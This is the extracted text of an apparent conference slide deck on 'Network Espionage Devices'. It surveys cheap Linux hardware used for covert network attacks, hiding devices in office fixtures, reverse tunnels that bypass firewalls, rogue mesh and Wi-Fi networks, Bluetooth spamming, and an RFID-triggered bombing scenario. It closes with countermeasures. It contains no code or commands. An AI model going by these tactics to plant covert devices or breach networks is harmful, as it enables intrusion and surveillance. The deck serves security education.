5. Warnings and Stuff
This is academic research...the “how” not the “why”
●
This is “dangerous information”...however
●
You have the right/need to know
–
I have the right/need to talk
–
Oh yeah...and remember
●
Devices (in context) may be illegal...don't use
–
Activities (in context) may be illegal...don't do
–
6. Objectives
Academic information exchange
●
My favorite cheap 'n mean gear (network focused)
●
Attacks & countermeasures
●
“The nasty”
●
Resources
●
7. Agenda
Objectives
●
Attacks
●
Network Espionage Devices (NEDs)
●
Gettin' Spooky with IT
●
Countermeasures
●
8. “Waiter, my mushroom soup tastes funny”
Never underestimate the devastation
of a “simple” attack
9. Attacker Goals
Attacker wants to accomplish...
●
Gain network access via a device at victim's location
–
Attack internal/external hosts via TCP/IP
–
Attack phone/PDA/PC via Bluetooth
–
Passively gather information via sniffing
–
Establish other internal and external access
–
Impersonate services – Webserver, Database
–
Target a user – VIP VoIP connection
–
10. Attack Tools
Typical opensource methods and tools
●
Scanning & Probing
–
Sniffing
–
Exploiting
–
Covert communications, reverse crypto connections
–
Multiple protocols and entry points
●
Wired LAN
–
802.11b/g wireless
–
Bluetooth
–
RFID
–
11. NEDs
My favorites
●
Linksys WRT54G
–
Linksys NSLU2
–
Nokia 770
–
Gumstix
–
PicoTux
–
Plenty of others!
●
Access Points, PDAs, Game platforms, etc.
–
12. Agenda
Objectives
●
Attacks
●
Network Espionage Devices (NEDs)
●
Gettin' Spooky with IT
●
Countermeasures
●
13. NED Characteristics
Small, unobtrusive, ubiquitous, cute
●
Low-cost, almost disposable
●
Minimal power requirements
●
Power over ethernet, battery, solar potential
–
Multiple attack vector capability
●
Wired, Wireless, Bluetooth, RFID
–
Traditional forensics very difficult
●
Ephemeral filesystems running in RAM
–
Try that Encase!
●
14. NED Characteristics
Outbound reverse connections back to attacker
●
Crypto tunnels bypass firewalls, IDS/IPS
–
“Under the radar” common protocols DNS requests,
–
ICMP, HTTP/S are typically allowed through firewalls
Proxies, anonymizers, bouncing through multiple boxes
–
Ported attack tools and exploits
●
ARM processor-based
–
Hardware/software limitations and trade-offs
–
Dependent libraries, GUIs, etc.
●
Don't expect Nessus GUI on Linksys routers
●
15. NED Characteristics
Stripped-down Linux
●
BusyBox shell
●
SSH, HTTP/S management
●
Features like VPN tunnels, mesh networking
●
On-the-fly software install as “packages”
●
DNS, Apache, Asterisk
–
Attack tools and exploits
–
Powerful scripting languages: Python, Ruby
–
16. Linksys WRT54G
Cheap, cute, heavily “hacked” and tweaked
●
Secure with default Linksys firmware?
●
Ubiquitous = the “new Windows”
–
Very likely unpublished exploits in the wild
–
Opensource alternatives to Linksys firmware
●
OpenWRT
–
Package system
●
Sveasoft
–
Mesh networking
●
Un-leashing the WRT54G....
●
17. FairuzaUS for Linksys
FairuzaUS: www.hackerpimps.com
●
Command line interface over SSH
Treo 650 SSH into FairuzaUS
into compromised Windows box
18. Upcoming Linksys
EVDO & Wifi = WOW!
●
Linux- based
●
This will become popular
●
Potential for abuse is big
●
19. Nokia 770
Basics
●
Debian Linux PDA
–
Slow CPU, low RAM
–
802.11b & Bluetooth
–
Touchscreen keyboard
–
Software & Commercial Attack Platform Development
–
Immunity SILICA (Dave Aitel)
●
http://immunitysec.com/products-silica.shtml
HD Moore doing work on this platform (MetaSploit)
●
Maemo project and security tool packaged
●
Tcpdump, Nmap, Dsniff, Kismet, Bluetooth audit
–
20. Linksys NSLU2 “Slug”
US $75
●
Heavy OpenSource support
●
Unslung, Openslug, DebianSlug
–
USB storage
●
Bluetooth dongles
●
Asterisk, WebCam, MP3 stream
●
Try if you're looking for a weekend geek project
●
I'm looking into this as a testing platform
●
21. Gumstix
Ultra-small computers ($120 +)
●
Expandable “snap in” boards
●
CF storage and 802.11b wireless
–
Single and dual Ethernet with POE
–
MITM hardware device with dual ethernet
●
Bluetooth
–
USB, serial, PS/2 connectors
–
Used in BlueSniper, UltraSwarm
–
Developer CDs and environment
–
22. PicoTux
Picotux 100 and 112 (US $100 +)
●
World's smallest Linux computer
–
35mm×19mm×19mm (size of RJ45 connector)
–
Power over ethernet
–
Telnet and HTTP server
–
Developer CDs and environment
–
Attacks
●
Plenum off a Cisco CAT switch
–
“Serial to ethernet connector”
–
23. Other Gear
KeyKatcher
●
PS/2 and new USB version
–
New “U3” USB key technology
●
Auto-run apps, installs, pull SAM on-the-fly,etc.
–
EVDO USB Key
●
“Executive Gift USB” - Swiss Army USB/Knife
●
Infected RFID tags
●
Infects reader, which then infects other tags and DB
–
http://www.rfidvirus.org/papers/press_release.pdf
●
24. Other Gear
Linux Phones
●
Customizable
–
Bluetooth, Wifi, cameras, etc.
–
Qtopia
●
Security people “discussing ideas”
–
Prediction: top “hacker” phone
–
BlackDog
●
Linux box on USB
–
Biometric auth
●
25. Agenda
Objectives
●
Attacks
●
Network Espionage Devices (NEDs)
●
Gettin' Spooky with IT
●
Countermeasures
●
26. Spooky: Device Enclosures
Free water cooler offer ;)
●
Potential for power source
–
Legitimate reason for physical presence..and returning
–
Office décor
●
Flower safe with X-mas tree & lights...plug 'n play
–
Exit Sign, fire extinguisher
●
Dangerous to mess with emerg. Gear
–
But what if extra gear shows up?
●
Wow, we have even more security now!
–
27. Spooky: 0wn3d Mesh Network
Municipal networks beware!
●
Build It
●
EVDO gateway for Internet
–
Drive-by/Walk-by AP 0wn4g3
–
Senao AP w/ YAGI = Sweeper
–
Run It
●
Karma = DHCP for everybody
–
Shared crypto keys, cron jobs, remote ssh-fs mounts
–
0wn it
●
Attack everything, browser exploits on portal
–
28. Spooky: In-Transit “Marketing”
Airports, train stations, bus stations, subways, etc.
●
Bluetooth spamming with “scary” message content
–
0wn3d wifi networks & Windows Messaging
–
Multiplier-effect
●
Simultaneous at multiple hubs in US
–
“Scary message”
–
Huge productivity costs
●
Wrong message
–
Used as diversion, secondary attack, etc.
●
Virus/worm type attack like this is possible
●
29. Of Course...
Why not hack the marketing guy's gear instead?
●
“CBS today said it is planning a marketing initiative
that will allow mobile users with Bluetooth-enabled
phones to download promotional clips from its new
fall TV shows directly to their handsets at billboard
locations in New York.
The billboards in Grand Central station....”
Digging a little deeper
●
kameleon-media.com
–
“Remote data loading via a GPRS or Ethernet modem that
●
connects directly the MobiPoint® to our server.”
30. Spooky: Long-distance,
the next best thing to being there
Home-built Bluetooth/Wifi “Sniper” setups
●
Bluetooth targets up to one mile 802.11b targets up to...?
32. Maxing Out Current Gear
Janus Scanner – DefCon 14
●
8 Senao hi-power cards (125 mile wifi-record card)
●
Amplifier 1-watt to “keep it legal”
●
Linux, Kismet, etc.
●
Pelican case
●
Data encrypted
●
1 button operation
●
Also “BlueBag”
●
Target Bluetooth
–
33. Terrorism & RFID Passports
US Passports will have RFID tags
●
Each US State's Drivers' licenses probably next
–
RFID security weaknesses already found
●
Reading tags at a distance is a documented threat
●
The “Nightmare Scenario”
●
Discussed in media already
–
NED (or cell) RFID scan for passports
–
Connected to explosive device
●
Detonate X number in range
●
34. Countermeasures
Know the risks and threats
●
Know your network devices and traffic
●
User education, buy-in, ownership of the problem
●
Policy and “best practices”
●
Planned response vs. “Uh oh...”
●
Calling the cavalry (specialists, Johnny Law)
–
Proactive measures
●
Honeypots, Honeynets, Bluetooth-honeypot
–
Yet to see a RFID honeypot (sell to Wal-Mart?)
–
35. Looking Forward & Other Stuff
More devices with network access
●
“Why is my refrigerator scanning my network?”
–
Mobile devices will be targeted
●
VoIP and the new-style phone tapping agenda
●
VoIP phones as room taps
–
Capture VoIP traffic
–
Same old story
●
New technology, adoption, poor security, etc.
–
36. Thanks!
Questions?
●
Feel free to contact me at shawnmer@io.com
●